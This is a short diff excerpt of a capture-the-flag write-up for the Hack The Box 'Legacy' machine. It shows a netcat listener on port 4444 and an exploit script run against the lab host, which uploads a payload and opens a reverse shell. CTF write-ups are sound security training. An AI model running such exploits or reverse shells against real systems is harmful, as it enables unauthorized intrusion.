rafamarrara/CTFs/HTB/Legacy/README.md

 listening on [any] 4444 ...
 ```

 When executing our script, it will upload our file and open a fragile shell on the target.
-But as soon as we run our payload, it will connect to our listner.
+But as soon as we run our payload, it will connect to our listner and we will have a more consistent shell.

 ```
 $ python zzz_exploit.py 10.10.10.4